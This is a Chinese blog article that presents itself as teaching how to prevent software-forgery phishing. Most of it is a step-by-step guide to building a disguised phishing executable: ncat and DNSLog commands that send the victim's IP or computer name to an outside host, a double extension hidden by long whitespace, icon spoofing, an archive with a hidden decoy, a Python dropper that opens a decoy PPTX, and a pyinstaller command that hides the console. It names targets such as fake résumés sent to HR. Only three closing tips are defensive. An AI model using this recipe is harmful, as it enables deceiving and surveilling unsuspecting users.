d:\Readme.txtncat x.x.x.x 6">
当前位置:   article > 正文

如何防止社工钓鱼——软件伪造

如何防止社工钓鱼——软件伪造

防止社工钓鱼——软件伪造,本文首先介绍社工时,是怎么进行软件伪造 欺骗用户的。然后介绍钓鱼软件可能会在哪些场景使用。最后也会总结防止社工钓鱼——软件伪造的注意事项。

下面简单介绍一个伪造的例子。

目的:通过简单的软件伪造,验证是否有防范社工钓鱼的警惕性,确认是否有被钓鱼成功的用户。

首先考虑如何确认是否存在被钓鱼成功的用户,初步想法是将主机部分信息写入到文件,再使用ncat传输文件到服务器上。做法如下:

  1. # 在服务器上启动 持续接收文件的监听,将接收到的数据写到test.txt
  2. ncat -lk 666 >test.txt
  3. # 钓鱼软件中,写入文件,并将文件传输到服务器上
  4. ipconfig | find /i "ipv4"> d:\Readme.txt
  5. ncat x.x.x.x 666 <d:\Readme.txt # x.x.x.x为服务器ip

后续考虑到,由于ncat并不是系统自带命令,没法保证文件传输成功,另外可能路径没有权限写入文件等等问题,就放弃了。

于是考虑使用DNSLog平台外带数据,用于确认是否有钓鱼成功的用户。DNSLog平台可以监控DNS解析记录和HTTP访问记录,简单来说DNSLog平台提供了一个abcd.ceye.io的域名,那么可以把信息写在高级域名,本地ping  %computername%.abcd.ceye.io,在DnsLog平台上即可看到该条域名解析记录。HTTP访问记录即访问平台提供的http页面时,访问记录也可以查看到。

做法如下:

  1. 1.使用在线的DNSLog(如:CEYE) 或 搭建DNSLog平台(在github上查找开源项目自行搭建)
  2. 假定此时获得域名为 abcd.ceye.io,DNS服务器为 1.1.1.1
  3. 公网环境下:钓鱼软件中ping %computername%.abcd.ceye.io 即可
  4. 内网环境,且无法访问外网:只能自行搭建DNSLog平台,但由于无法指定被钓鱼主机的DNS服务器,
  5. 所以直接ping abcd.ceye.io是无法解析成功的。可以通过nslookup命令指定DNS服务器做域名解析
  6. nslookup %computername%.abcd.ceye.io 1.1.1.1

解决了“确认是否有被钓鱼成功的用户”的问题后,接下来开始考虑如何进行软件伪造。

1.伪造文件拓展名

  1. 使用超长文件名,隐藏实际的文件拓展名。
  2. 如需要伪造为test.pptx,文件名则为test.pptx        .exe

2.伪造文件图标

  1. 使用 Resource Hacker 软件替换原钓鱼软件的图标,或在脚本打包为exe文件时,选择类似的图标。
  2. 图标可以通过ps、图标库、网上图片查找。

 3.运行效果伪造

  1. 钓鱼软件如果运行后,如果没有打开被伪造的文件(运行test.pptx .exe后,没有打开test.pptx),
  2. 或弹出控制台,则会引起用户的注意。
  3. 从两个方面解决,
  4. 一:将钓鱼软件和被伪造的文件添加到压缩包里,钓鱼软件中打开被伪造软件,伪造文件设置隐藏,解压
  5. 后则只会显示钓鱼软件。同时压缩包也能避免文件传输过程中暴露文件后缀。
  6. 二:打包时关闭控制台(不能使用os.system,否则即使关闭控制台,运行时也会闪过控制台)

 钓鱼脚本:

  1. # -*- coding: utf-8 -*-
  2. import subprocess
  3. import os
  4. from win32com.client import Dispatch
  5. # 钓鱼软件实际希望执行的内容
  6. # xxxx
  7. subprocess.Popen("nslookup %computername%.abcd.ceye.io", shell=True)
  8. try:
  9. r_file_path = os.getcwd() + "\\test.pptx"
  10. ppt = Dispatch('PowerPoint.Application')
  11. ppt.Presentations.Open(r_file_path)
  12. except:
  13. pass

  1. # 打包时,选择图标,取消控制台
  2. pyinstaller -F test.py -i pptx.ico -w

如果未勾选 显示隐藏的项目,解压后则只显示钓鱼文件,且执行后打开test.pptx文件。

钓鱼软件的使用场景:伪造为个人简历,发送给HR;伪造成学习资料、课件,上传到网络上;伪造为其他软件安装包。

如何避免被钓鱼软件社工:
1.收到陌生人发来的压缩包 或 从网络上下载压缩包时,先不要解压,使用压缩软件打开,查看里面的文件内容,这样既可以查看到隐藏文件,也可以查看到实际的文件类型。
2.文件管理器勾选查看隐藏的项目,显示文件后缀,打开文件前注意文件类型。
3.从官方渠道下载安装包。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/黑客灵魂/article/detail/790390
推荐阅读
相关标签
  

闽ICP备14008679号